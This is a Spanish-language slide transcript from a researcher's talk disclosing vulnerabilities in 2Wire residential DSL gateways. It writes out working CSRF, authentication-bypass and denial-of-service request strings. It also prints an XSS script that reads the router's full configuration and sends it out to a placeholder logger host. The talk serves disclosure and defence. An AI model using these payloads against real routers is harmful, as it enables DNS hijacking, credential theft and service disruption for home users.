vulnerabilidades en modems 2wire - hakim.ws · 2wire residential gateways módem/router dsl con...
TRANSCRIPT
Vulnerabilidades en Modems 2WireVulnerabilidades en Modems 2Wire
hkmhkm
QUIEN SOY?
hkm
De Cozumel, Q.Roo.
He sido:Investigador forenseAnalista de malwareRespuesta a incidentesAuditor y consultor
Página personal:http://www.hakim.ws
Foros:https://underground.org.mx
2Wire Residential Gateways
Módem/Router DSL con funciones de administración de red, firewll y capacidad de administración remota.
2Wire produce los HomePortal Residential Gateways. Son sistemas embedidos con soporte nativo de TR-069, HomePNA, MoCA, USB, 802.11b/g y acceso vía web.
AT&T en los Estados Unidos, Bell en Canada, BT en Reino Unido, SingTel en Singapur, Telecom en Nueva Zelanda, PLDT en las Filipinas, Telmex en México.
2Wire en el mundo
Vulnerabilidades en módems 2Wire
Cross Site Request Forgery
C
Authentication Bypass
Reseteo de password con la WEP
CRLF Denegación de Servicio
DSL Denegación de Servicio
Cross Site Scripting
Revelación de Configuración
Denegación de Servicio Remoto
La interfáz web
(por lo general en 192.168.1.254 o gateway.2wire.net)
La interfáz web de configuración avanzada
La administración de la tabla DNS en la interfáz web
Client side
Algunas formas de hacer que el cliente realize una petición...
Visitando una página
HTML tags con atributos src y *srcOtros tags HTML como <background= Meta refresh CSS's url()
C
HTTP Redirect .htaccess redirect .php: header("Location, ("Refresh ... .js: location, url, new Image().src=Applet de Java
& Muuchas más
Archivos que soportan peticiones:
.swf.wmf.htm.mov.mpg.pdf.inf.bat.exe
Cross Site Request Forgery
Modifica la configuración del dispositivo usando una petición GET
Deshabilita la autenticación inalámbrica:/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0
Agrega el dominio en la tabla de hosts del ruteador:/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.prueba.hkm&ADDR=216.163.137.3
(redirige el dominio www.prueba.hkm a 216.163.137.3)
)
[video demo]
CSRF demo stats
Cross Site Request Forgery ON THE WILD
Primer caso de Drive-by Pharming detectado por Symantec
Actualmente se puede descargar una “GUIA PARA LIMPIAR DNS” de la página de Telmexque sugiere que elimines mi dominio: www.prueba.hkm
Authentication Bypass (page=H04)
�
/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J33&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
(cambia el password a admin)
)
Se podía cambiar el password incluso cuando tenía password puesto.
H04 Authentication Bypass ON THE WILD (en un .swf)
H
Resetear el passwordcon la WEP
“It's a feature,not a bug.” (TM)
(
Resetear el password con la WEP ON THE WILD
Denial of Service
CRLF DoS published by preth00nker in 2006.
/xslt?page=%0d%0a
(reboots the device)
�
DSL DoS
The DSL connection can be reset by sending a request to /xslt with “%X” where X is any character that is not from A-z.
/xslt?page=%&/xslt?page=%@...
(resets DSL connection)
�
Denegación de Servicio ON THE WILD
Cross Site Scripting (a quien le importa?*)
)
Muchos, en todos lados.
Hay algunos persistentes tambien...
Revelación de Configuración
Fue publicado por primera vez con el nombre de “URL Mágico” lol. Esta página contiene la configuración completa del ruteador, incluyendo la clave WEP (en texto simple), credenciales DSL, MAC, y mucho más.
Se puede obtener este URL sniffeando la comunicacion con del programa del “Asistente”.
Revelación de Configuración Remota (*XSS + Config Disclosure)
X
-XSS-var ImageObject = new Image();ImageObject.src= "http://192.168.1.254/base/web/def/def/images/nav_sl_logo";
if(ImageObject.height>0){var iframe = unescape('%3Ciframe%20name%3Diframe%20style%3D%22visibility%3A%20hidden%3B%22%20width%3D2%20height%3D2%20src%3D%22http%3A//192.168.1.254/xslt%3FPAGE%3DH04%26THISPAGE%3D%3C/SCRIPT%3E%3D%3CSCRIPT%20SRC%3Dhttp%3A//xxxx/cp.js%3E%3C/SCRIPT%3E%22%3E%3C/iframe%3E');} else {var iframe = unescape('%3Ciframe%20name%3Diframe%20style%3D%22visibility%3A%20hidden%3B%22%20width%3D2%20height%3D2%20src%3D%22http%3A//gateway.2wire.net/xslt%3FPAGE%3DH04%26THISPAGE%3D%3C/SCRIPT%3E%3D%3CSCRIPT%20SRC%3Dhttp%3A//xxxx/cp.js%3E%3C/SCRIPT%3E%22%3E%3C/iframe%3E');}document.write(iframe);
-cp.js-xmlhttp.open("GET","/xslt?page=mgmt_data",false);xmlhttp.send(null);var doc = xmlhttp.responseText;var h = parseInt(doc.length / 800)+1;var k = 0;var m = 0;function statement1 () { contenido = doc.substr(k,800); k=k+800; with(document)body.appendChild(createElement("script")).setAttribute("src","http://xxxx/logger.php?file="+contenido);
m++; if (m>h){ clearInterval(tid);
} }var tid = setInterval('statement1()', 1000);
(obtiene remotamente el archivo completo de configuración)
(
[video demo]
Authentication Bypass en la página CD35_SETUP_01
Encontré que en esta página es posible cambiar el password incluso cuando el password esta puesto.
/xslt?PAGE=CD35_SETUP_01_POST&password1=admin&password2=admin&HINT=admin
(cambia el password a admin)
)
Password Reset en la página CD35_SETUP_01Si envias un password con mas de 512 chars el password se elimina y la próxima vez que se acceda al router se mostrará la página H04.
/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm
(elimina el password)
�
Denegación de Servicio Remoto
Los módems tienen una interfáz de administración remota en el puerto 50001 por SSL.
https://<IP REMOTA>:50001/xslt?page=%0d%0a
(reinicia el ruteador de forma remota)
�
Denegación de Servicio Remoto ON THE WILD
Muchas Gracias!
Pedro Joaquín [email protected]
http://www.hakim.ws
http://www.webvuln.com
https://www.underground.org.mx